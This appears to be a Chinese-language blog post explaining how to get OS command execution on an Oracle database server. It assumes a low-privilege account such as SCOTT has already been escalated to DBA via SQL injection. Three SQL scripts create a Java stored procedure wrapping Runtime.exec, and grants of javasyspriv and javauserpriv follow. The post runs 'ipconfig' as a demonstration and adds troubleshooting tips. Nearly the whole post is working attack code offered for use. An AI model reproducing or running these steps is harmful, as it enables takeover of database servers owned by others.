前奏:

需要利用有REscourse权限的用户比如SCOTT登录Oracle并用SQLInjection提权至DBA权限

网上有一种执行OS命令的方法:

c:\1.sql
create or replace and compile
java souRCe named "util"
as
import java.io.*;
import java.lang.*;
public class util extends Object
{
public static int RunThis(String args)
{
Runtime rt = Runtime.getRuntime();
int RC = -1;
try
{
Process p = rt.exec(args);
int bufSize = 4096;
BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize);
int len;
byte buffer[] = new byte[bufSize];
// Echo back what the program spit out
while ((len = bis.read(buffer, 0, bufSize)) != -1)
System.out.write(buffer, 0, len);
RC = p.waitFor();
}
catch (Exception e)
{
e.printStackTrace();
RC = -1;
}
finally
{
return RC;
}
}
}

c:\2.sql

create or replace
function RUN_CMz(p_cmd in varchar2) return number
as
language java
name 'util.RunThis(java.lang.String) return integer';

c:\3.sql

create or replace procedure RC(p_cmd in varChar)
as
x number;
begin
x := RUN_CMz(p_cmd);
end;

登陆上去后依旧是依次执行

SQL> @c:\1.sql
        /

       @c:\2.sql

       /

      @c:\3.sql

      /

variable x number;

set serveroutput on;

exec dbms_java.set_output(100000);

grant javasyspriv to system;

grant javauserpriv to system; 网上的方法没有这一行,我无法成功,加上去可以

exec :x:=run_cmz('ipconfig');
 

注意:最后加亮的两句~这里的system要对应你登录的用户名~比如用scott登录的~就要更改为scott,另外如果第一次执行错误要退出后从新登录再顺序执行~否则Oracle会一直提示权限不够~